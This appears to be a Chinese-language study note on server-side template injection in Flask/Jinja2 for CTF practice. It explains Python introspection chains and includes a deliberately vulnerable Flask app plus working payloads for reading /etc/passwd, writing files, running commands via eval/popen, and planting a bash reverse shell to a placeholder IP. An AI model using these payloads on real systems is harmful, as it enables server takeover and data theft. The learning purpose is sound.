SSTI学习

模板引擎

模板引擎（这里特指用于Web开发的模板引擎）是为了使用户界面与业务数据（内容）分离而产生的，它可以生成特定格式的文档，利用模板引擎来生成前端的html代码，模板引擎会提供一套生成html代码的程序，然后只需要获取用户的数据，然后放到渲染函数里，然后生成模板+用户数据的前端html页面，然后反馈给浏览器，呈现在用户面前。

模板引擎也会提供沙箱机制来进行漏洞防范，但是可以用沙箱逃逸技术来进行绕过。

SSTI(模板注入)

SSTI 就是服务器端模板注入（Server-Side Template Injection）

当前使用的一些框架，比如python的flask，php的tp，java的spring等一般都采用成熟的的MVC的模式，用户的输入先进入Controller控制器，然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断，数据库存取，最后把结果返回给View视图层，经过模板渲染展示给用户。

漏洞成因就是服务端接收了用户的恶意输入以后，未经任何处理就将其作为 Web 应用模板内容的一部分，模板引擎在进行目标编译渲染的过程中，执行了用户插入的可以破坏模板的语句，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。

凡是使用模板的地方都可能会出现 SSTI 的问题，SSTI 不属于任何一种语言，沙盒绕过也不是，沙盒绕过只是由于模板引擎发现了很大的安全漏洞，然后模板引擎设计出来的一种防护机制，不允许使用没有定义或者声明的模块，这适用于所有的模板引擎。

Python SSTI

介绍

CTF中经常见到的就是Flask框架，而Flask中默认的模板语言是Jinja2，render_template 函数封装了该模板引擎

模板语法主要分两种变量和结构标签

{{}}表示这是一个变量，可以根据用户在模块端给予的参数的不同，进行调整

{% %}这样代表控制语句

控制语句经常使用的for和if

if

{% if title %}                                    
<title>{{title}} - microblog</title>      
{% else %}
<title>Welcome to microblog</title>
{% endif %}

for

{% for user in users %}
<li>{{ user.username|title }}</li>
{% endfor %}

SSTI测试脚本:

from flask import Flask, render_template, render_template_string, request,flash
app = Flask(__name__)
 
@app.route('/yunying')
def hello():
    code = request.args.get('ssti')
    html = '''
    <h2>The ssti is </h2>
    <h3>%s</h3>
    ''' % (code)
    return render_template_string(html)
 
if __name__ == "__main__":
    app.run()

传入{{3*9}}让模板解析

还可以用Flask中常见的几个全局变量去测试比如config,g,session,request去探测是否存在ssti漏洞

利用

python中一切均为对象，均继承object对象

python的 SSTI大部分是依靠基类->子类->危险函数的方式来利用ssti，以下为一些内置方法

• __class__

万物皆对象，而class用于返回该对象所属的类，比如某个字符串，他的对象为字符串对象，而其所属的类为<class 'str'>。

• __bases__

以元组的形式返回一个类所直接继承的类

• __base__

以字符串返回一个类所直接继承的类

• __mro__

返回解析方法调用的顺序

• __subclasses__()

获取类的所有子类

• __init__

所有自带带类都包含init方法，便于利用他当跳板来调用globals

• __globals__

function.__globals__，用于获取function所处空间下可使用的module、方法以及所有变量

总结:

__dict__　　 ：保存类实例或对象实例的属性变量键值对字典
__class__　　：返回一个实例所属的类
__mro__　　  ：返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。
__bases__　　：以元组形式返回一个类直接所继承的类（可以理解为直接父类）__base__　　 ：和上面的bases大概相同，都是返回当前类所继承的类，即基类，区别是base返回单个，bases返回是元组
// __base__和__mro__都是用来寻找基类的
__subclasses__　　：以列表返回类的子类
__init__　　 ：类的初始化方法
__globals__　　   ：返回函数所在模块命名空间中的所有变量
__getattribute__() ：获取属性或方法，对模块和类都有效
__getitem__() ：以索引取值或者键取值
__builtin__&&__builtins__　　：python中可以直接运行一些函数，例如int()，list()等等。　　　　　　　　　　　　　　　　　　
这些函数可以在__builtin__可以查到。查看的方法是dir(__builtins__)　　　　　　　　　　　　　　　　　　
在py3中__builtin__被换成了builtin　　　　　　　　　　　　　　　　　　
1.在主模块main中，__builtins__是对内建模块__builtin__本身的引用，即__builtins__完全等价于__builtin__。　　　　　　　　　　　　　　　　　　
2.非主模块main中，__builtins__仅是对__builtin__.__dict__的引用，而非__builtin__本身

SSTI中主要的目的:

• 执行命令
• 读取文件内容(flag)

执行shell相关函数

//执行shell的模块
import os, commands, platfrom, subprocess 
//执行shell的函数
os.system('ls')
os.popen('ls').read()
platform.popen('ls').read()
status,output = commands.getstatusoutput('ls')
subprocess.call(['ifconfig'],shell=True)

读文件的话

py2中
file对象或者open函数
py3中
没有file对象，只能用open函数

__class__，class用于返回该对象所属的类

 __bases __，以元组的形式返回一个类所直接继承的所有类。

 __base __，以字符串返回一个类所直接继承的类

 __mro __，返回解析方法调用的顺序

可以看到__bases__返回了test()的两个父类，__base_返回了test()的第一个父类，__mro__按照子类到父类到父类解析的顺序返回所有类(python2和python2有区别)

__subclasses __()，获取类的所有子类

__init __
所有自带带类都包含init方法，便于利用他当跳板来调用globals

__globals __

function.__globals __，用于获取function所处空间下可使用的module、方法以及所有变量

__dict__，保存类实例或对象实例的属性变量键值对字典

__getattribute__()，获取属性或方法，对模块和类都有效

python2利用

就放几个常见的payload理解一下

文件读取和写入

#读文件
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}} 
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
#写文件
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/1').write("") }}

任意执行

{{''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg','w').write('code')}} 
{{ config.from_pyfile('/tmp/owned.cfg') }} 
{{''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg','w').write('from subprocess import check_output

RUNCMD = check_output
')}} 
{{ config.from_pyfile('/tmp/owned.cfg') }} 
{{ config['RUNCMD']('/usr/bin/id',shell=True) }}   

#假设在/usr/lib/python2.7/dist-packages/jinja2/environment.py, 弹一个shell
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/usr/lib/python2.7/dist-packages/jinja2/environment.py').write("
os.system('bash -i >& /dev/tcp/[IP_ADDR]/[PORT] 0>&1')") }}

无回显

{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']('1+1')}}     
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').system('whoami')")}}

任意执行只需要一条指令

{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}} 
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")}}(system函数换为popen('').read()，需要导入os模块) 
{{().__class__.__bases__[0].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}(不需要导入os模块，直接从别的模块调用)

#剩下的考完试再写，一个下午基本懂原理和构造方式了，发现有很多文章杂七杂八的，想总结的话比较困难，理解了就会构造了就完事了，其他的就总结下奇怪的姿势就OK了

参考:

https://www.cnblogs.com/-qing-/p/11656544.html

https://blog.csdn.net/weixin_34203426/article/details/86355535

https://www.cnblogs.com/zaqzzz/p/10251892.html

https://blog.csdn.net/qq_40657585/article/details/83657220